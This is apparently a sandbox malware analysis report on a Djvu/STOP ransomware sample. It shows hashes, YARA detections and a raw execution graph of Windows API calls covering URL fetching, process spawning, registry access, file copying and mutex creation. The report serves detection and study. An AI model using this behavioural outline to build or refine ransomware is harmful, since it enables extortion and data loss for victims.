                                                                                                                          Imagebase:0xe30000
                                                                                                                          File size:1'150'976 bytes
                                                                                                                          MD5 hash:DE93E8A0692DB2C2F178270B8DA7B5D7
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.1757349681.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.1757349681.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000000.1745267014.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000000.1745267014.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.1757288854.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000000.1745023046.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:6
                                                                                                                          Start time:00:41:15
                                                                                                                          Start date:16/01/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --AutoStart
                                                                                                                          Imagebase:0xe30000
                                                                                                                          File size:1'150'976 bytes
                                                                                                                          MD5 hash:DE93E8A0692DB2C2F178270B8DA7B5D7
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.1839557804.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1839557804.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.1827821890.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.1827888819.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.1827888819.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1839495564.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:36.2%
                                                                                                                            Total number of Nodes:836
                                                                                                                            Total number of Limit Nodes:85
                                                                                                                            execution_graph 38407 46a290 38412 47cc50 38407->38412 38421 483b4c 38412->38421 38414 47cc5d 38416 46a299 38414->38416 38431 4af1bb 59 API calls 3 library calls 38414->38431 38418 4819ac 38416->38418 38466 4818b0 38418->38466 38420 46a2a8 38424 483b54 38421->38424 38423 483b6e 38423->38414 38424->38423 38426 483b72 std::exception::exception 38424->38426 38432 480c62 38424->38432 38449 48793d DecodePointer 38424->38449 38450 490eca RaiseException 38426->38450 38428 483b9c 38451 490d91 58 API calls _free 38428->38451 38430 483bae 38430->38414 38433 480cdd 38432->38433 38443 480c6e 38432->38443 38460 48793d DecodePointer 38433->38460 38435 480c79 38435->38443 38452 487f51 58 API calls __NMSG_WRITE 38435->38452 38453 487fae 58 API calls 8 library calls 38435->38453 38454 487b0b 38435->38454 38436 480ce3 38461 485208 58 API calls __getptd_noexit 38436->38461 38439 480ca1 RtlAllocateHeap 38440 480cd5 38439->38440 38439->38443 38440->38424 38442 480cc9 38458 485208 58 API calls __getptd_noexit 38442->38458 38443->38435 38443->38439 38443->38442 38447 480cc7 38443->38447 38457 48793d DecodePointer 38443->38457 38459 485208 58 API calls __getptd_noexit 38447->38459 38449->38424 38450->38428 38451->38430 38452->38435 38453->38435 38462 487ad7 GetModuleHandleExW 38454->38462 38457->38443 38458->38447 38459->38440 38460->38436 38461->38440 38463 487af0 GetProcAddress 38462->38463 38464 487b07 ExitProcess 38462->38464 38463->38464 38465 487b02 38463->38465 38465->38464 38467 4818bc __wfsopen 38466->38467 38474 487dfc 38467->38474 38473 4818e3 __wfsopen 38473->38420 38491 488af7 38474->38491 38476 4818c5 38477 4818f4 DecodePointer DecodePointer 38476->38477 38478 481921 38477->38478 38479 4818d1 38477->38479 38478->38479 38500 48a78d 59 API calls __stricmp_l 38478->38500 38488 4818ee 38479->38488 38481 481984 EncodePointer EncodePointer 38481->38479 38482 481933 38482->38481 38484 481958 38482->38484 38501 488d25 61 API calls 2 library calls 38482->38501 38484->38479 38486 481972 EncodePointer 38484->38486 38502 488d25 61 API calls 2 library calls 38484->38502 38486->38481 38487 48196c 38487->38479 38487->38486 38503 487e05 38488->38503 38492 488b08 38491->38492 38493 488b1b EnterCriticalSection 38491->38493 38498 488b9f 58 API calls 10 library calls 38492->38498 38493->38476 38495 488b0e 38495->38493 38499 487c2e 58 API calls 3 library calls 38495->38499 38498->38495 38500->38482 38501->38484 38502->38487 38506 488c81 LeaveCriticalSection 38503->38506 38505 4818f3 38505->38473 38506->38505 38507 483f84 38508 483f90 __wfsopen 38507->38508 38544 492603 GetStartupInfoW 38508->38544 38510 483f95 38546 4878d5 GetProcessHeap 38510->38546 38512 483fed 38513 483ff8 38512->38513 38876 48411a 58 API calls 3 library calls 38512->38876 38547 485141 38513->38547 38516 483ffe 38517 484009 __RTC_Initialize 38516->38517 38877 48411a 58 API calls 3 library calls 38516->38877 38568 488754 38517->38568 38520 484018 38521 484024 GetCommandLineW 38520->38521 38878 48411a 58 API calls 3 library calls 38520->38878 38587 49235f GetEnvironmentStringsW 38521->38587 38524 484023 38524->38521 38527 48403e 38528 484049 38527->38528 38879 487c2e 58 API calls 3 library calls 38527->38879 38597 4921a1 38528->38597 38532 48405a 38611 487c68 38532->38611 38535 484062 38536 48406d __wwincmdln 38535->38536 38881 487c2e 58 API calls 3 library calls 38535->38881 38617 479f90 38536->38617 38539 484081 38540 484090 38539->38540 38873 487f3d 38539->38873 38882 487c59 58 API calls _doexit 38540->38882 38543 484095 __wfsopen 38545 492619 38544->38545 38545->38510 38546->38512 38883 487d6c 36 API calls 2 library calls 38547->38883 38549 485146 38884 488c48 InitializeCriticalSectionAndSpinCount __mtinitlocks 38549->38884 38551 48514b 38552 48514f 38551->38552 38886 4924f7 TlsAlloc 38551->38886 38885 4851b7 61 API calls 2 library calls 38552->38885 38555 485161 38555->38552 38557 48516c 38555->38557 38556 485154 38556->38516 38887 488c96 38557->38887 38560 4851ae 38895 4851b7 61 API calls 2 library calls 38560->38895 38563 48518d 38563->38560 38565 485193 38563->38565 38564 4851b3 38564->38516 38894 48508e 58 API calls 4 library calls 38565->38894 38567 48519b GetCurrentThreadId 38567->38516 38569 488760 __wfsopen 38568->38569 38570 488af7 __lock 58 API calls 38569->38570 38571 488767 38570->38571 38572 488c96 __calloc_crt 58 API calls 38571->38572 38573 488778 38572->38573 38574 4887e3 GetStartupInfoW 38573->38574 38575 488783 __wfsopen @_EH4_CallFilterFunc@8 38573->38575 38581 4887f8 38574->38581 38582 488927 38574->38582 38575->38520 38576 4889ef 38909 4889ff LeaveCriticalSection _doexit 38576->38909 38578 488c96 __calloc_crt 58 API calls 38578->38581 38579 488974 GetStdHandle 38579->38582 38580 488987 GetFileType 38580->38582 38581->38578 38581->38582 38583 488846 38581->38583 38582->38576 38582->38579 38582->38580 38908 49263e InitializeCriticalSectionAndSpinCount 38582->38908 38583->38582 38584 48887a GetFileType 38583->38584 38907 49263e InitializeCriticalSectionAndSpinCount 38583->38907 38584->38583 38588 492370 38587->38588 38589 484034 38587->38589 38910 488cde 38588->38910 38593 491f64 GetModuleFileNameW 38589->38593 38591 492396 _signal 38592 4923ac FreeEnvironmentStringsW 38591->38592 38592->38589 38594 491f98 _wparse_cmdline 38593->38594 38595 488cde __malloc_crt 58 API calls 38594->38595 38596 491fd8 _wparse_cmdline 38594->38596 38595->38596 38596->38527 38598 4921ba _GetLocaleNameFromLangCountry 38597->38598 38602 48404f 38597->38602 38599 488c96 __calloc_crt 58 API calls 38598->38599 38607 4921e3 _GetLocaleNameFromLangCountry 38599->38607 38600 49223a 38918 480bed 58 API calls 2 library calls 38600->38918 38602->38532 38880 487c2e 58 API calls 3 library calls 38602->38880 38603 488c96 __calloc_crt 58 API calls 38603->38607 38604 49225f 38919 480bed 58 API calls 2 library calls 38604->38919 38607->38600 38607->38602 38607->38603 38607->38604 38608 492276 38607->38608 38917 48962f 58 API calls __stricmp_l 38607->38917 38920 4842fd 8 API calls 2 library calls 38608->38920 38610 492282 38612 487c74 __IsNonwritableInCurrentImage 38611->38612 38921 49aeb5 38612->38921 38614 487c92 __initterm_e 38615 4819ac __cinit 67 API calls 38614->38615 38616 487cb1 _doexit __IsNonwritableInCurrentImage 38614->38616 38615->38616 38616->38535 38618 479fa0 __ftell_nolock 38617->38618 38924 46cf10 38618->38924 38620 479fb0 38621 479fc4 GetCurrentProcess GetLastError SetPriorityClass 38620->38621 38622 479fb4 38620->38622 38623 479fe6 38621->38623 38624 479fe4 GetLastError 38621->38624 39148 4724e0 109 API calls _memset 38622->39148 38938 47d3c0 38623->38938 38624->38623 38627 479fb9 38627->38539 38629 47a022 38941 47d340 38629->38941 38630 47b669 39229 4af23e 59 API calls 2 library calls 38630->39229 38632 47b673 39230 4af23e 59 API calls 2 library calls 38632->39230 38637 47a065 38946 473a90 38637->38946 38641 47a159 GetCommandLineW CommandLineToArgvW lstrcpyW 38642 47a33d GlobalFree 38641->38642 38657 47a196 38641->38657 38643 47a354 38642->38643 38644 47a45c 38642->38644 38646 472220 76 API calls 38643->38646 39002 472220 38644->39002 38645 47a100 38645->38641 38648 47a359 38646->38648 38650 47a466 38648->38650 39017 46ef50 38648->39017 38649 47a1cc lstrcmpW lstrcmpW 38649->38657 38650->38539 38652 47a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 38652->38657 38653 47a48f 38656 47a4ef 38653->38656 39022 473ea0 38653->39022 38655 480235 60 API calls _TranslateName 38655->38657 38659 471cd0 92 API calls 38656->38659 38657->38642 38657->38649 38657->38652 38657->38655 38658 47a361 38657->38658 38962 483c92 38658->38962 38661 47a563 38659->38661 38694 47a5db 38661->38694 39043 474690 38661->39043 38663 47a395 OpenProcess 38665 47a402 38663->38665 38666 47a3a9 WaitForSingleObject CloseHandle 38663->38666 38965 471cd0 38665->38965 38666->38665 38671 47a3cb 38666->38671 38667 47a6f9 39150 471a10 8 API calls 38667->39150 38668 47a5a9 38673 474690 59 API calls 38668->38673 38685 47a3d4 Sleep 38671->38685 38686 47a3e2 GlobalFree 38671->38686 39149 471ab0 PeekMessageW DispatchMessageW PeekMessageW 38671->39149 38672 47a6fe 38675 47a8b6 CreateMutexA 38672->38675 38676 47a70f 38672->38676 38678 47a5d4 38673->38678 38674 47a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 38679 47a451 38674->38679 38681 47a8ca 38675->38681 38680 47a7dc 38676->38680 38692 46ef50 58 API calls 38676->38692 39066 46d240 CoInitialize 38678->39066 38679->38539 38687 46ef50 58 API calls 38680->38687 38684 46ef50 58 API calls 38681->38684 38682 47a624 GetVersion 38682->38667 38688 47a632 lstrcpyW lstrcatW lstrcatW 38682->38688 38697 47a8da 38684->38697 38685->38663 38689 47a3f7 38686->38689 38690 47a7ec 38687->38690 38691 47a674 _memset 38688->38691 38689->38539 38693 47a7f1 lstrlenA 38690->38693 38696 47a6b4 ShellExecuteExW 38691->38696 38699 47a72f 38692->38699 38695 480c62 _malloc 58 API calls 38693->38695 38694->38667 38694->38672 38694->38675 38694->38682 38698 47a810 _memset 38695->38698 38696->38672 38718 47a6e3 38696->38718 38700 473ea0 59 API calls 38697->38700 38713 47a92f 38697->38713 38702 47a81e MultiByteToWideChar lstrcatW 38698->38702 38701 473ea0 59 API calls 38699->38701 38704 47a780 38699->38704 38700->38697 38701->38699 38702->38693 38703 47a847 lstrlenW 38702->38703 38705 47a856 38703->38705 38706 47a8a0 CreateMutexA 38703->38706 38707 47a792 38704->38707 38708 47a79c CreateThread 38704->38708 39152 46e760 95 API calls 38705->39152 38706->38681 39151 473ff0 59 API calls _signal 38707->39151 38708->38680 38712 47a7d0 38708->38712 39496 47dbd0 95 API calls 4 library calls 38708->39496 38711 47a860 CreateThread WaitForSingleObject 38711->38706 39497 47e690 185 API calls 8 library calls 38711->39497 38712->38680 39153 475c10 38713->39153 38715 47a98c 39168 472840 60 API calls 38715->39168 38717 47a997 39169 470fc0 93 API calls 4 library calls 38717->39169 38718->38539 38720 47a9ab 38721 47a9c2 lstrlenA 38720->38721 38721->38718 38723 47a9d8 38721->38723 38722 475c10 59 API calls 38724 47aa23 38722->38724 38723->38722 39170 472840 60 API calls 38724->39170 38726 47aa2e lstrcpyA 38728 47aa4b 38726->38728 38729 475c10 59 API calls 38728->38729 38730 47aa90 38729->38730 38731 46ef50 58 API calls 38730->38731 38732 47aaa0 38731->38732 38733 473ea0 59 API calls 38732->38733 38734 47aaf5 38732->38734 38733->38732 39171 473ff0 59 API calls _signal 38734->39171 38736 47ab1d 39172 472900 38736->39172 38738 46ef50 58 API calls 38740 47abc5 38738->38740 38739 47ab28 _memmove 38739->38738 38741 473ea0 59 API calls 38740->38741 38742 47ac1e 38740->38742 38741->38740 39177 473ff0 59 API calls _signal 38742->39177 38744 47ac46 38745 472900 60 API calls 38744->38745 38747 47ac51 _memmove 38745->38747 38746 46ef50 58 API calls 38748 47acee 38746->38748 38747->38746 38749 473ea0 59 API calls 38748->38749 38750 47ad43 38748->38750 38749->38748 39178 473ff0 59 API calls _signal 38750->39178 38752 47ad6b 38753 472900 60 API calls 38752->38753 38755 47ad76 _memmove 38753->38755 38754 475c10 59 API calls 38756 47ae2a 38754->38756 38755->38754 39179 473580 59 API calls 38756->39179 38758 47ae3c 38759 475c10 59 API calls 38758->38759 38760 47ae76 38759->38760 39180 473580 59 API calls 38760->39180 38762 47ae82 38763 475c10 59 API calls 38762->38763 38764 47aebc 38763->38764 39181 473580 59 API calls 38764->39181 38766 47aec8 38767 475c10 59 API calls 38766->38767 38768 47af02 38767->38768 39182 473580 59 API calls 38768->39182 38770 47af0e 38771 475c10 59 API calls 38770->38771 38772 47af48 38771->38772 39183 473580 59 API calls 38772->39183 38774 47af54 38775 475c10 59 API calls 38774->38775 38776 47af8e 38775->38776 39184 473580 59 API calls 38776->39184 38778 47af9a 38779 475c10 59 API calls 38778->38779 38780 47afd4 38779->38780 39185 473580 59 API calls 38780->39185 38782 47afe0 39186 473100 59 API calls 38782->39186 38784 47b001 39187 473580 59 API calls 38784->39187 38786 47b025 39188 473100 59 API calls 38786->39188 38788 47b03c 39189 473580 59 API calls 38788->39189 38790 47b059 39190 473100 59 API calls 38790->39190 38792 47b070 39191 473580 59 API calls 38792->39191 38794 47b07c 39192 473100 59 API calls 38794->39192 38796 47b093 39193 473580 59 API calls 38796->39193 38798 47b09f 39194 473100 59 API calls 38798->39194 38800 47b0b6 39195 473580 59 API calls 38800->39195 38802 47b0c2 39196 473100 59 API calls 38802->39196 38804 47b0d9 39197 473580 59 API calls 38804->39197 38806 47b0e5 39198 473100 59 API calls 38806->39198 38808 47b0fc 39199 473580 59 API calls 38808->39199 38810 47b108 38812 47b130 38810->38812 39200 47cdd0 59 API calls 38810->39200 38813 46ef50 58 API calls 38812->38813 38814 47b16e 38813->38814 38816 47b1a5 GetUserNameW 38814->38816 39201 472de0 59 API calls 38814->39201 38817 47b1c9 38816->38817 39202 472c40 38817->39202 38819 47b1d8 39209 472bf0 59 API calls 38819->39209 38821 47b1ea 39210 46ecb0 60 API calls 2 library calls 38821->39210 38823 47b2f5 39213 4736c0 59 API calls 38823->39213 38825 47b308 39214 46ca70 59 API calls 38825->39214 38827 47b311 39215 4730b0 59 API calls 38827->39215 38829 472c40 59 API calls 38844 47b1f3 38829->38844 38830 47b322 39216 46c740 102 API calls 4 library calls 38830->39216 38832 472900 60 API calls 38832->38844 38833 47b327 39217 4711c0 169 API calls 2 library calls 38833->39217 38836 47b33b 39218 47ba10 LoadCursorW RegisterClassExW 38836->39218 38838 473100 59 API calls 38838->38844 38839 47b343 39219 47ba80 CreateWindowExW ShowWindow UpdateWindow 38839->39219 38841 47b34b 38845 47b34f 38841->38845 39220 470a50 65 API calls 38841->39220 38844->38823 38844->38829 38844->38832 38844->38838 39211 473580 59 API calls 38844->39211 39212 46f1f0 59 API calls 38844->39212 38845->38718 38846 47b379 39221 473100 59 API calls 38846->39221 38848 47b3a5 39222 473580 59 API calls 38848->39222 38850 47b48b 39228 47fdc0 CreateThread 38850->39228 38852 47b49f GetMessageW 38853 47b4bf 38852->38853 38854 47b4ed 38852->38854 38855 47b4c5 TranslateMessage DispatchMessageW GetMessageW 38853->38855 38857 47b502 PostThreadMessageW 38854->38857 38858 47b55b 38854->38858 38855->38854 38855->38855 38859 47b510 PeekMessageW 38857->38859 38860 47b564 PostThreadMessageW 38858->38860 38861 47b5bb 38858->38861 38862 47b546 WaitForSingleObject 38859->38862 38863 47b526 DispatchMessageW PeekMessageW 38859->38863 38864 47b570 PeekMessageW 38860->38864 38861->38845 38867 47b5d2 CloseHandle 38861->38867 38862->38858 38862->38859 38863->38862 38863->38863 38865 47b5a6 WaitForSingleObject 38864->38865 38866 47b586 DispatchMessageW PeekMessageW 38864->38866 38865->38861 38865->38864 38866->38865 38866->38866 38867->38845 38872 47b3b3 38872->38850 39223 47c330 59 API calls 38872->39223 39224 47c240 59 API calls 38872->39224 39225 47b8b0 59 API calls 38872->39225 39226 473260 59 API calls 38872->39226 39227 47fa10 CreateThread 38872->39227 39498 487e0e 38873->39498 38875 487f4c 38875->38540 38876->38513 38877->38517 38878->38524 38882->38543 38883->38549 38884->38551 38885->38556 38886->38555 38889 488c9d 38887->38889 38890 485179 38889->38890 38892 488cbb 38889->38892 38896 49b813 38889->38896 38890->38560 38893 492553 TlsSetValue 38890->38893 38892->38889 38892->38890 38904 4929c9 Sleep 38892->38904 38893->38563 38894->38567 38895->38564 38897 49b81e 38896->38897 38901 49b839 38896->38901 38898 49b82a 38897->38898 38897->38901 38905 485208 58 API calls __getptd_noexit 38898->38905 38900 49b849 HeapAlloc 38900->38901 38902 49b82f 38900->38902 38901->38900 38901->38902 38906 48793d DecodePointer 38901->38906 38902->38889 38904->38892 38905->38902 38906->38901 38907->38583 38908->38582 38909->38575 38912 488cec 38910->38912 38911 480c62 _malloc 58 API calls 38911->38912 38912->38911 38913 488d1e 38912->38913 38915 488cff 38912->38915 38913->38591 38915->38912 38915->38913 38916 4929c9 Sleep 38915->38916 38916->38915 38917->38607 38918->38602 38919->38602 38920->38610 38922 49aeb8 EncodePointer 38921->38922 38922->38922 38923 49aed2 38922->38923 38923->38614 38925 46cf32 _memset __ftell_nolock 38924->38925 38926 46cf4f InternetOpenW 38925->38926 38927 475c10 59 API calls 38926->38927 38928 46cf8a InternetOpenUrlW 38927->38928 38929 46cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 38928->38929 38931 46cfb2 38928->38931 39231 4756d0 38929->39231 38931->38620 38932 4756d0 59 API calls 38934 46d049 38932->38934 38933 46d000 38933->38932 38934->38931 39250 473010 59 API calls 38934->39250 38936 46d084 38936->38931 39251 473010 59 API calls 38936->39251 39256 47ccc0 38938->39256 38942 47cc50 59 API calls 38941->38942 38943 47d36c 38942->38943 38944 47a04d 38943->38944 39263 47d740 59 API calls 38943->39263 38944->38632 38944->38637 38947 473ab2 38946->38947 38948 473ad0 GetModuleFileNameW PathRemoveFileSpecW 38946->38948 38949 473b00 38947->38949 38950 473aba 38947->38950 38956 478400 38948->38956 39264 4af23e 59 API calls 2 library calls 38949->39264 38951 483b4c 59 API calls 38950->38951 38953 473ac7 38951->38953 38953->38948 39265 4af1bb 59 API calls 3 library calls 38953->39265 38957 478437 38956->38957 38958 478446 38956->38958 38957->38958 39266 475d50 59 API calls _signal 38957->39266 38959 4784b9 38958->38959 39267 478d50 59 API calls 38958->39267 38959->38645 39268 491781 38962->39268 39286 48f7c0 38965->39286 38968 471d20 _memset 38969 471d40 RegQueryValueExW RegCloseKey 38968->38969 38970 471d8f 38969->38970 38971 475c10 59 API calls 38970->38971 38972 471dbf 38971->38972 38973 471dd1 lstrlenA 38972->38973 38974 471e7c 38972->38974 39288 473520 59 API calls 38973->39288 38976 471e94 6 API calls 38974->38976 38978 471ef5 UuidCreate UuidToStringW 38976->38978 38977 471df1 38979 471e3c PathFileExistsW 38977->38979 38982 471e00 38977->38982 38980 471f36 38978->38980 38979->38974 38981 471e52 38979->38981 38980->38980 38984 475c10 59 API calls 38980->38984 38983 471e6a 38981->38983 38986 474690 59 API calls 38981->38986 38982->38977 38982->38979 38987 4721d1 38983->38987 38985 471f59 RpcStringFreeW PathAppendW CreateDirectoryW 38984->38985 38988 471fce 38985->38988 38990 471f98 38985->38990 38986->38983 38987->38674 38989 475c10 59 API calls 38988->38989 38992 47201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 38989->38992 38991 475c10 59 API calls 38990->38991 38991->38988 38992->38987 38993 47207c _memset 38992->38993 38994 472095 6 API calls 38993->38994 38995 472115 _memset 38994->38995 38996 472109 38994->38996 38998 472125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 38995->38998 39289 473260 59 API calls 38996->39289 38999 4721b2 38998->38999 39000 4721aa GetLastError 38998->39000 39001 4721c0 WaitForSingleObject 38999->39001 39000->38987 39001->38987 39001->39001 39003 48f7c0 __ftell_nolock 39002->39003 39004 47222d 7 API calls 39003->39004 39005 4722bd K32EnumProcesses 39004->39005 39006 47228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 39004->39006 39007 4722d3 39005->39007 39008 4722df 39005->39008 39006->39005 39007->38648 39009 472353 39008->39009 39010 4722f0 OpenProcess 39008->39010 39009->38648 39011 472346 CloseHandle 39010->39011 39012 47230a K32EnumProcessModules 39010->39012 39011->39009 39011->39010 39012->39011 39013 47231c K32GetModuleBaseNameW 39012->39013 39290 480235 39013->39290 39015 47233e 39015->39011 39016 472345 39015->39016 39016->39011 39018 480c62 _malloc 58 API calls 39017->39018 39021 46ef6e _memset 39018->39021 39019 46efdc 39019->38653 39020 480c62 _malloc 58 API calls 39020->39021 39021->39019 39021->39020 39021->39021 39023 473f05 39022->39023 39029 473eae 39022->39029 39024 473fb1 39023->39024 39025 473f18 39023->39025 39306 4af23e 59 API calls 2 library calls 39024->39306 39027 473f2d 39025->39027 39028 473fbb 39025->39028 39032 473f3d _signal 39025->39032 39027->39032 39305 476760 59 API calls 2 library calls 39027->39305 39307 4af23e 59 API calls 2 library calls 39028->39307 39029->39023 39034 473ed4 39029->39034 39032->38653 39037 473eef 39034->39037 39038 473ed9 39034->39038 39304 473da0 59 API calls _signal 39037->39304 39303 473da0 59 API calls _signal 39038->39303 39041 473eff 39041->38653 39042 473ee9 39042->38653 39044 47478c 39043->39044 39045 4746a9 39043->39045 39310 4af26c 59 API calls 3 library calls 39044->39310 39047 4746b6 39045->39047 39048 4746e9 39045->39048 39050 474796 39047->39050 39054 4746c2 39047->39054 39049 4747a0 39048->39049 39051 4746f5 39048->39051 39312 4af23e 59 API calls 2 library calls 39049->39312 39311 4af26c 59 API calls 3 library calls 39050->39311 39064 474707 _signal 39051->39064 39309 476950 59 API calls 2 library calls 39051->39309 39308 473340 59 API calls _memmove 39054->39308 39061 4746e0 39061->38668 39064->38668 39067 46d27d CoInitializeSecurity 39066->39067 39073 46d276 39066->39073 39068 474690 59 API calls 39067->39068 39069 46d2b8 CoCreateInstance 39068->39069 39070 46d2e3 VariantInit VariantInit VariantInit VariantInit 39069->39070 39071 46da3c CoUninitialize 39069->39071 39072 46d38e VariantClear VariantClear VariantClear VariantClear 39070->39072 39071->39073 39074 46d3e2 39072->39074 39075 46d3cc CoUninitialize 39072->39075 39073->38694 39313 46b140 39074->39313 39075->39073 39078 46d3f6 39318 46b1d0 39078->39318 39080 46d422 39081 46d426 CoUninitialize 39080->39081 39082 46d43c 39080->39082 39081->39073 39083 46b140 60 API calls 39082->39083 39085 46d449 39083->39085 39086 46b1d0 SysFreeString 39085->39086 39087 46d471 39086->39087 39088 46d496 CoUninitialize 39087->39088 39089 46d4ac 39087->39089 39088->39073 39091 46d8cf 39089->39091 39092 46b140 60 API calls 39089->39092 39091->39071 39093 46d4d5 39092->39093 39094 46b1d0 SysFreeString 39093->39094 39095 46d4fd 39094->39095 39095->39091 39096 46b140 60 API calls 39095->39096 39097 46d5ae 39096->39097 39098 46b1d0 SysFreeString 39097->39098 39099 46d5d6 39098->39099 39099->39091 39100 46b140 60 API calls 39099->39100 39101 46d679 39100->39101 39102 46b1d0 SysFreeString 39101->39102 39103 46d6a1 39102->39103 39103->39091 39104 46b140 60 API calls 39103->39104 39105 46d6b6 39104->39105 39106 46b1d0 SysFreeString 39105->39106 39107 46d6de 39106->39107 39107->39091 39108 46b140 60 API calls 39107->39108 39109 46d707 39108->39109 39110 46b1d0 SysFreeString 39109->39110 39111 46d72f 39110->39111 39111->39091 39112 46b140 60 API calls 39111->39112 39113 46d744 39112->39113 39114 46b1d0 SysFreeString 39113->39114 39115 46d76c 39114->39115 39115->39091 39322 483aaf GetSystemTimeAsFileTime 39115->39322 39117 46d77d 39324 483551 39117->39324 39122 472c40 59 API calls 39123 46d7b5 39122->39123 39124 472900 60 API calls 39123->39124 39125 46d7c3 39124->39125 39126 46b140 60 API calls 39125->39126 39127 46d7db 39126->39127 39128 46b1d0 SysFreeString 39127->39128 39129 46d7ff 39128->39129 39129->39091 39130 46b140 60 API calls 39129->39130 39131 46d8a3 39130->39131 39132 46b1d0 SysFreeString 39131->39132 39133 46d8cb 39132->39133 39133->39091 39134 46b140 60 API calls 39133->39134 39135 46d8ea 39134->39135 39136 46b1d0 SysFreeString 39135->39136 39137 46d912 39136->39137 39137->39091 39332 46b400 SysAllocString 39137->39332 39139 46d936 VariantInit VariantInit 39140 46b140 60 API calls 39139->39140 39141 46d985 39140->39141 39142 46b1d0 SysFreeString 39141->39142 39143 46d9e7 VariantClear VariantClear VariantClear 39142->39143 39144 46da46 CoUninitialize 39143->39144 39145 46da10 39143->39145 39144->39073 39336 48052a 78 API calls __snprintf_l 39145->39336 39148->38627 39149->38671 39150->38672 39151->38708 39152->38711 39154 475c66 39153->39154 39159 475c1e 39153->39159 39155 475c76 39154->39155 39156 475cff 39154->39156 39165 475c88 _signal 39155->39165 39492 476950 59 API calls 2 library calls 39155->39492 39493 4af23e 59 API calls 2 library calls 39156->39493 39159->39154 39163 475c45 39159->39163 39166 474690 59 API calls 39163->39166 39165->38715 39167 475c60 39166->39167 39167->38715 39168->38717 39169->38720 39170->38726 39171->38736 39173 473a90 59 API calls 39172->39173 39174 47294c MultiByteToWideChar 39173->39174 39175 478400 59 API calls 39174->39175 39176 47298d 39175->39176 39176->38739 39177->38744 39178->38752 39179->38758 39180->38762 39181->38766 39182->38770 39183->38774 39184->38778 39185->38782 39186->38784 39187->38786 39188->38788 39189->38790 39190->38792 39191->38794 39192->38796 39193->38798 39194->38800 39195->38802 39196->38804 39197->38806 39198->38808 39199->38810 39200->38812 39201->38814 39203 472c71 39202->39203 39204 472c5f 39202->39204 39207 4756d0 59 API calls 39203->39207 39205 4756d0 59 API calls 39204->39205 39206 472c6a 39205->39206 39206->38819 39208 472c8a 39207->39208 39208->38819 39209->38821 39210->38844 39211->38844 39212->38844 39213->38825 39214->38827 39215->38830 39216->38833 39217->38836 39218->38839 39219->38841 39220->38846 39221->38848 39222->38872 39223->38872 39224->38872 39225->38872 39226->38872 39227->38872 39494 47f130 218 API calls _TranslateName 39227->39494 39228->38852 39495 47fd80 64 API calls 39228->39495 39232 475735 39231->39232 39237 4756de 39231->39237 39233 47573e 39232->39233 39234 4757bc 39232->39234 39241 475750 _signal 39233->39241 39254 476760 59 API calls 2 library calls 39233->39254 39255 4af23e 59 API calls 2 library calls 39234->39255 39237->39232 39242 475704 39237->39242 39241->38933 39244 47571f 39242->39244 39245 475709 39242->39245 39253 473ff0 59 API calls _signal 39244->39253 39252 473ff0 59 API calls _signal 39245->39252 39248 475719 39248->38933 39249 47572f 39249->38933 39250->38936 39251->38931 39252->39248 39253->39249 39254->39241 39257 483b4c 59 API calls 39256->39257 39258 47ccca 39257->39258 39261 47a00a 39258->39261 39262 4af1bb 59 